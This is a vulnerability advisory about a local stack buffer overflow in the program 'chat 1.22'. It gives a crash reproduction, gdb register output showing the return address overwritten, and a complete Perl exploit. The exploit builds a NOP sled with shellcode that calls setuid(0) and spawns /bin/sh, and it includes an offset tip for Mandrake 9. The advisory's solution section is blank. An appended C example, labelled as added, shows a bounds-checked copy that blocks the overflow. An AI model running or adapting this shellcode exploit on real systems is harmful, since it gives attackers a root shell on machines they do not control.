COMMAND

    chat locale buffer overflow

SYSTEMS AFFECTED

    chat 1.22

PROBLEM

    securma massine [securma@caramail.com] says:

    chat is prone to a buffer overflow with a buffer [1056]byte

    root@tasanou sbin]# ./chat `perl -e 'print "A"x1056'`
    Segmentation fault (core dumped)
    [root@tasanou sbin]# gdb chat core.3261 --quiet
    (no debugging symbols found)...
    Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    Reading symbols from /lib/i686/libc.so.6...(no debugging symbols found)...done.
    Loaded symbols for /lib/i686/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...done.
    Loaded symbols for /lib/ld-linux.so.2
    #0  0x41414141 in ?? ()
    (gdb) info reg
    eax            0x804de90        134536848
    ecx            0x0      0
    edx            0x186a1  100001
    ebx            0x41414141       1094795585
    esp            0xbffe6cc0       0xbffe6cc0
    ebp            0x41414141       0x41414141
    esi            0x41414141       1094795585
    edi            0x41414141       1094795585
    eip            0x41414141       0x41414141

    eip is overwritten

    exploit code:
    =============

    #!/usr/bin/perl
    #greets marocit

    $shellcode =
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    $ret    = 0xbfffe8e0;
    $buf    = 1056;
    $egg    = 6000;
    $nop    = "\x90";
    $offset = 0;

    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    $addr = pack('l', ($ret + $offset));

    for ($i = 0; $i < $buf; $i += 4) {
        $buffer .= $addr;
    }
    for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {
        $buffer .= $nop;
    }
    $buffer .= $shellcode;

    exec("./chat", $buffer, 0);

    #i use offset 1640 (mandrake 9)

SOLUTION

    ?
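Added example, not code from the advisory or from chat 1.22: the bounds check that keeps a fixed 1056-byte stack buffer from being overrun by an overlong argument, shown next to the unchecked copy pattern that produces the crash above. BUF_LEN, copy_arg and first_overlong_arg are illustrative names; only the buffer size is taken from the advisory.

```c
/* Defensive example written for this page; it is not chat's source.
 * The 1056-byte buffer size mirrors the advisory; names are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_LEN 1056   /* buffer size reported in the advisory */

/* Unchecked pattern (shown for comparison, never executed here):
 *   char buf[BUF_LEN];
 *   strcpy(buf, argv[1]);
 * With no length check, an argument of 1056 bytes or more runs past
 * buf into the saved frame pointer and return address, which is why
 * the core dump above shows ebp and eip equal to 0x41414141 ("AAAA"). */

/* Bounds-checked copy: returns the number of bytes copied, or -1 and
 * leaves dst empty when src plus its terminating NUL does not fit. */
int copy_arg(char *dst, size_t dstlen, const char *src)
{
    size_t n = strnlen(src, dstlen);  /* never read more than dstlen */
    if (n >= dstlen) {                /* no room left for the NUL */
        if (dstlen) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Validate every argument before any is copied into a BUF_LEN buffer.
 * Returns the index of the first overlong argument, or -1 if all fit. */
int first_overlong_arg(int argc, char **argv, size_t limit)
{
    for (int i = 1; i < argc; i++)
        if (strnlen(argv[i], limit) >= limit)
            return i;
    return -1;
}

int main(int argc, char **argv)
{
    char buf[BUF_LEN];
    int bad = first_overlong_arg(argc, argv, sizeof buf);
    if (bad != -1) {
        fprintf(stderr, "argument %d too long (limit %zu bytes)\n",
                bad, sizeof buf - 1);
        return 1;   /* refuse the input instead of smashing the stack */
    }
    if (argc > 1 && copy_arg(buf, sizeof buf, argv[1]) >= 0)
        printf("copied %zu bytes\n", strlen(buf));
    return 0;
}
```

Run with the advisory's 1056 "A" argument, the program exits with an error instead of a segmentation fault.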